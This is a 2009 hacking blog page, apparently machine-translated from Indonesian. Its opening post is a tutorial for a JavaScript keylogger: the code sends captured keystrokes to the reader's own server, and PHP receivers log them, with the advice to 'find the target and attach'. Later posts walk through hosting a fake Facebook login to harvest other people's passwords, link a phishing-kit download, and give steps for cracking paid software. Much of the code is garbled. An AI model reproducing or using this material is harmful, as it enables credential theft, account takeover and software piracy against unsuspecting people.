Senin, 13 Juli 2009

Make Keylogger with javascript on the website

Bookmark and Share

At this time I will discuss a bit about Javascript Keylogger.

Wow ... Moreover tuh, Google may be able to answer you questions.

Oke without many words directly aja yah ...

First, open notepad or a pet you like WordPad, Notepad ++... The point is up ...

Then paste the following code:


[+]----------------------------------------------- -------------------


var key ='';

var space = ''

function start ()

(

var xmlhttp;

if (window.XMLHttpRequest)

(

/ / Code for IE7 +, Firefox, Chrome, Opera, Safari

xmlhttp = new XMLHttpRequest ();

)

else if (window.ActiveXObject)

(

/ / Code for IE6, IE5

xmlhttp = new ActiveXObject ( "Microsoft.XMLHTTP");

)

else

(

alert ( "Browser Support XMLHTTP You Not!");

)

xmlhttp.open ( "POST", "http://yoursite/open.php", true);

xmlhttp.send (null);

)

ajaxFunction function ()

(

var xmlhttp;

if (window.XMLHttpRequest)

(

/ / Code for IE7 +, Firefox, Chrome, Opera, Safari

xmlhttp = new XMLHttpRequest ();

)

else if (window.ActiveXObject)

(

/ / Code for IE6, IE5

xmlhttp = new ActiveXObject ( "Microsoft.XMLHTTP");

)

else

(

alert ( "Your browser does not support XMLHTTP");

)

xmlhttp.open ( "POST", "http://yoursite/write.php?d =" + key, true);

xmlhttp.send (null);

)

document.write ('');


[+]----------------------------------------------- -------------------


Then save it with the name keylog.js ... Remember, JS extension. And one should not forget, "yoursite" is replaced with

URL of your own ...

Create more open.php and write.php in notepad with the following script


open.php


[+]----------------------------------------------- -------------------


$ data = $ _GET [ 'd'];

$ fp = fopen ( 'log.txt', 'a');

fwrite ($ fp, $ data);

fclose ($ fp);

?>


[+]----------------------------------------------- -------------------


salin.php


[+]----------------------------------------------- -------------------


$ data = $ _GET [ 'd'];

$ fp = fopen ( 'log.txt', 'a');

fwrite ($ fp, $ data);

fclose ($ fp);

?>


[+]----------------------------------------------- -------------------


And now you have three files namely keylog.js, open.php, write.php ...

Because I try in localhost then I'll try to make a simple HTML script

that will be used as my own website.


[+]----------------------------------------------- -------------------


Type What You Like That




[+]----------------------------------------------- -------------------


And store with the name zhecou.html

Well if you want to put it in your website then you simply add


[+]----------------------------------------------- -------------------



[+]----------------------------------------------- -------------------


Ngerti? Now place the four files zhecou.html, keylog.js, open.php and start.php

in the same directory. Well I in my directory C: mysite

because I use WAMP server

Now therefore, I will change the URL in the keylog.js be


[+]----------------------------------------------- -------------------


http://localhost/mysite


[+]----------------------------------------------- -------------------


Practice


So when you open a browser and direct you to http://localhost/mysite/zhecou.html

Well here you can type are

I will type "Many Thanks Dah guzzle You To See The Article Here"


So you will see the emergence hasil.txt that contain those words

Okay here until the first well, this article may be less useful but ... Only that

I can give ...

Now that you have to do is find the target and attach to keylog

I really comparable with the r57, C99, C100, dkk but definitely happy to be developed if ..




Hacking Facebook (Taking other people Acount)

Bookmark and Share

Who does not know that Facebook is all in the era of the internet this? Yap, Facebook is a social site, such as a laptop also ... (Males ngomong nih, a leader ma aja yah google ..)
Yes I, my previous post about how to log on false friends, this time I post about how to create a false log on facebook.

Yuuk directly to the discussion ...


1. Please list in http://www.700megs.com
why do I send you the list there?
in the web hosting is free and there is also support from the php in ripway.com
if not registered simply log in at:
http://www.700megs.com/register.jsp

2. after you successfully register the incoming 700megs.com FILE MANAGER to delete the file index.html .... (there will be later in the Cpanel masing2)

3. OK, we start our practice.
needed is the file index.php and write.php as the core fakelogin
scriptnya please download here or in the first
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
file size 9kb.

4. after you download. There are two files called only index and write
both you please upload the 700megs.com before you have a list.

5. ago index.php first test I've uploaded and you log in from there,
I was successful .. there will be a new file; Password.txt [aim as the place
where the UserID and password that will tertampung on facebook you fakelogin]

6, alright! finished up here. . .

for distribution please masing2 way ...

cm here I love to sample one taking by force account2 facebook mania ..
open the file in the index www.700megs.com URL you .. take it .. [important]

hold for firefox users: open tools> options> main

preview


here we refer in order to function within the browser first opened the file directly led to us earlier. ravin allows you more later.
may be in the computer what to sebar / cafe in devotion.

or ..

can also spread this way



you create a new account, in yahoo, gmail, like ato

with nick @ Facebook or something like that.

cm above example ... please make your own art
enjoy ..

easy?

hopefully successfully. . .

Table rows

Bookmark and Share

A common function on many php (or other data driven) sites is to loop through an array and write the contents of the array to the page. It is preferable to spread your data over multiple columns instead of writing it all in a straight list thus forcing your readers to scroll forever. Here is an easy way to dynamically write your cells and rows using expressions.

























  1. $names=explode(",","Joe,Lisa,Bill,Roger,Fred,Kenney");






  2. $counter=-1;






  3. while (list(,$value)=each ($names))






  4. { $counter=$counter+1;






  5. ";





  6. //this is the key - if field has no remainder then field is in second column






  7. $newrow=($counter % 3);






  8. //echo $newrow;






  9. if ($newrow == 2) echo "
  10. " ;





  11. } // end of while






  12. //****This will write the data in three cells per row. To only do two cells






  13. //** per row change the 3 in the $newrow definition to a 2 and the






  14. //** comparison to a 1.






  15. ?>






  16. " . $names[$counter] . "&nbsp
    &nbsp

Create fake login with Phiser Maker

Bookmark and Share



Are you interested to make the page a fake site (phishing).
What is phishing?
Users for the virtual world is certainly not foreign to the word phishing ..
word meaning is a word of English, which means fishing. In a world of well-connected electronically at this time, many phishing term defined as a way to provoke someone to a particular page.


phishing is not infrequently used by the perpetrators of criminal on the internet in order to provoke someone to the web address through e-mail, one aim is to break down a very private information from the recipient, such as passwords, credit cards, etc. .

Among the information submitted as if the recipient's e-mail message to get out of a site, and invites to come to a false site. Site created false appearance in such a way that is similar to the original site. ago when the victim to fill in the password at the time that the Criminals know the password of the victim. Use of this site is also called the false with the term pharming.

I will provide tools for creating these false pages. You can practice for all pages

Download:

http://www.ziddu.com/download/5581398/Phisher_maker_3.1.rar.html

Hide Your IP Address v.1.0

Bookmark and Share

Hide Your IP Address purpose is to guard your privacy in Internet by changing your Internet IP Address. Start to surf anonymously. You can immediately take advantage of this handy and award winning software. The software will protect your Identity and Stop Hackers. Here is a short feature-list of this award winning software that gives you your privacy back!

- Protect and hide your Identity through hiding your IP address
- Prevent hackers from breaking into your computer
- Allows you to enter pages which are forbidden for you
- Changes your IP address (and your location)
- Delete information about ALL your internet activity
- Add your own Proxies and use your favorites

TO APPLY PATCH:
Paste the Patch into the installation directory, eg - C:\Programs and Files\Hide Your IP Address.
Open the Patch, make sure 'Make Backup' is ticked and click Patch.
You can now delete the Patch from the installation directory.
Open up Hide Your IP Address and a box will come up, click Register.
Type in anything you want for Name, E-Mail and Serial Key
Click Register then OK.
Restart Hide Your IP Address and you'll see its activated!


code:
http://rapidshare.com/files/166254810/hideyouripaddressv10.rar

or mirror :
http://depositfiles.com/files/7tkqqnhnz

Followers


junkelse by Junkelse. Powered by Blogger and Supported by kuchino.blogspot.com